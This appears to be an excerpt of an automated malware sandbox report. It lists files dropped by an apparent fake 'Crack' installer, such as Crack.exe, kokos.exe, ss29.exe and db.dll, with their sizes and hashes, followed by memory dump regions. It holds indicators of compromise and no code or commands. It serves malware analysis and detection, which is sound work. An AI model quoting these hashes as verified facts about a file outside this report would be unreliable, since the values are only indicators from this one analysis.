4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\ProgramData\8840.tmp.exe

Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b05990a5fe5a6220aaf08f7f2bb407e9

SHA1
fa8f701d6c8cb9879eb3fa1492ea82bae9ff702b

SHA256
e3aec878ff223c645d1a9361812fb91458c4cf84692e555bff9946701664a531

SHA512
8301719373674532e06bf2c347ea89f3c80400ece0a41875e7c2e63b33de37f5dc741f1d60b56e269ff91f3306bf4e59f780e555fc1e599e86e987806a5b9e4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe

Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe

Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe

Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe

Filesize
389KB

MD5
bc485fb11846b4cee31be99d155b4d61

SHA1
41059209141782573a511d20b23c06d37368bfca

SHA256
86a20cbba0c9f359ef0b7b91ea8cc48ee0ee39ebfbac20699a11857fa3021c54

SHA512
5c06a2a6053b3d0f53f2eb3e393f3d282fd83a13fca4661ec21211304a1422067554056479c764d545ee8df663ef918b1bb872a2761a2f0ba0ca354807176de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe

Filesize
389KB

MD5
bc485fb11846b4cee31be99d155b4d61

SHA1
41059209141782573a511d20b23c06d37368bfca

SHA256
86a20cbba0c9f359ef0b7b91ea8cc48ee0ee39ebfbac20699a11857fa3021c54

SHA512
5c06a2a6053b3d0f53f2eb3e393f3d282fd83a13fca4661ec21211304a1422067554056479c764d545ee8df663ef918b1bb872a2761a2f0ba0ca354807176de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe

Filesize
389KB

MD5
bc485fb11846b4cee31be99d155b4d61

SHA1
41059209141782573a511d20b23c06d37368bfca

SHA256
86a20cbba0c9f359ef0b7b91ea8cc48ee0ee39ebfbac20699a11857fa3021c54

SHA512
5c06a2a6053b3d0f53f2eb3e393f3d282fd83a13fca4661ec21211304a1422067554056479c764d545ee8df663ef918b1bb872a2761a2f0ba0ca354807176de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe

Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe

Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe

Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe

Filesize
148KB

MD5
6ffbbca108cfe838ca7138e381df210d

SHA1
bcfb0c02dcc12ed022600c67b8e059beed580cd2

SHA256
dab30b7895ab22c54ae495b1e99d858f2b2132bf849b4f4d0ea9a7832539ed78

SHA512
52f0c95e09811312d4777c1b04d80c0ebe713f0526988c698f17f0da6b42e3983e6dc9c3b8ba6d414b3d873fef298103f1e1a5d6dedda3d594eb0f62e12f1cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe

Filesize
148KB

MD5
6ffbbca108cfe838ca7138e381df210d

SHA1
bcfb0c02dcc12ed022600c67b8e059beed580cd2

SHA256
dab30b7895ab22c54ae495b1e99d858f2b2132bf849b4f4d0ea9a7832539ed78

SHA512
52f0c95e09811312d4777c1b04d80c0ebe713f0526988c698f17f0da6b42e3983e6dc9c3b8ba6d414b3d873fef298103f1e1a5d6dedda3d594eb0f62e12f1cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe

Filesize
148KB

MD5
6ffbbca108cfe838ca7138e381df210d

SHA1
bcfb0c02dcc12ed022600c67b8e059beed580cd2

SHA256
dab30b7895ab22c54ae495b1e99d858f2b2132bf849b4f4d0ea9a7832539ed78

SHA512
52f0c95e09811312d4777c1b04d80c0ebe713f0526988c698f17f0da6b42e3983e6dc9c3b8ba6d414b3d873fef298103f1e1a5d6dedda3d594eb0f62e12f1cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe

Filesize
579KB

MD5
fc30bd18d1c47073248613efe15751dd

SHA1
07063f997991dafe196905467ac54e0c0592effa

SHA256
5c3ab439485c080324d3e4ba5dab2b45161be6c7a2498c79d72b4721ab1b0539

SHA512
11ff7ae0818affb72d1602f9425777edd5397765bfa15691cbef91cc4dfe6e71fb04ec0955e69b224e1e529691b29816026d5b46e300e4cfb0466889871a5beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe

Filesize
579KB

MD5
fc30bd18d1c47073248613efe15751dd

SHA1
07063f997991dafe196905467ac54e0c0592effa

SHA256
5c3ab439485c080324d3e4ba5dab2b45161be6c7a2498c79d72b4721ab1b0539

SHA512
11ff7ae0818affb72d1602f9425777edd5397765bfa15691cbef91cc4dfe6e71fb04ec0955e69b224e1e529691b29816026d5b46e300e4cfb0466889871a5beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe

Filesize
579KB

MD5
fc30bd18d1c47073248613efe15751dd

SHA1
07063f997991dafe196905467ac54e0c0592effa

SHA256
5c3ab439485c080324d3e4ba5dab2b45161be6c7a2498c79d72b4721ab1b0539

SHA512
11ff7ae0818affb72d1602f9425777edd5397765bfa15691cbef91cc4dfe6e71fb04ec0955e69b224e1e529691b29816026d5b46e300e4cfb0466889871a5beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltvtuzfs.pno.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat

Filesize
557KB

MD5
01adcaf961bf2a3c4b2097a8b4cf38e7

SHA1
f6ac5fc466f834fca07a7f440bd34da76ebc5ca7

SHA256
5db86112c460dcac32890808ebeac8e10c06c1aea9bec01fb9d7c539ba6193c8

SHA512
af86c935eff30f2d28e597c3f3dc02a47435729b7616c1bab5059d6574e0af97648de07cc858ccf101e993c355509f743a107a67b769575dcdbc0d54bd875b21

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll

Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll

Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
memory/952-168-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/952-247-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/952-189-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/952-171-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/2884-220-0x000000001C4A0000-0x000000001C4B0000-memory.dmp

Filesize
64KB

Download
memory/2884-219-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3544-249-0x000002C70C560000-0x000002C70C570000-memory.dmp

Filesize
64KB

Download
memory/3544-248-0x000002C70C560000-0x000002C70C570000-memory.dmp

Filesize
64KB

Download
memory/3544-190-0x000002C70C560000-0x000002C70C570000-memory.dmp

Filesize
64KB

Download
memory/3544-205-0x000002C70C560000-0x000002C70C570000-memory.dmp

Filesize
64KB

Download
memory/3544-188-0x000002C726BE0000-0x000002C726C02000-memory.dmp

Filesize
136KB

Download
memory/3544-191-0x000002C70C560000-0x000002C70C570000-memory.dmp

Filesize
64KB

Download
memory/3580-233-0x0000000000980000-0x00000000009C0000-memory.dmp

Filesize
256KB

Download
memory/3580-250-0x0000000000400000-0x0000000000723000-memory.dmp

Filesize
3.1MB

Download
memory/4848-167-0x000001C76BC70000-0x000001C76BC80000-memory.dmp

Filesize
64KB

Download
memory/4848-166-0x000001C768070000-0x000001C768122000-memory.dmp

Filesize
712KB

Download
memory/5104-260-0x0000000002FF0000-0x0000000003163000-memory.dmp

Filesize
1.4MB

Download
memory/5104-261-0x0000000003170000-0x00000000032A4000-memory.dmp

Filesize
1.2MB

Download
memory/5104-262-0x0000000003170000-0x00000000032A4000-memory.dmp

Filesize
1.2MB

Download